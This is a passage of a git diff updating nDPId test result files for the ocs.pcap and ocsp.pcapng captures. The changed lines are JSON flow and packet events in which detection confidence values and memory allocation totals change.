+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"}} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786135,"flow_last_seen":1449652787495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} -00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-payload-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1449652846380} +00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-payload-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":106,"global_ts_msec":1449652846380} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 946/946 ~~ skipped flows.............: 0 @@ -114,9 +112,9 @@ ~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5927969 bytes -~~ total memory freed........: 5927969 bytes -~~ total allocations/frees...: 119161/119161 +~~ total memory allocated....: 6061603 bytes +~~ total memory freed........: 6061603 bytes +~~ total allocations/frees...: 121923/121923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 449 chars ~~ json string max len.......: 1481 chars diff --git a/test/results/ocsp.pcapng.out b/test/results/ocsp.pcapng.out index 8570b48f0..c747423ca 100644 --- a/test/results/ocsp.pcapng.out +++ b/test/results/ocsp.pcapng.out @@ -4,66 +4,66 @@ 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":8359,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1623222699655} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": 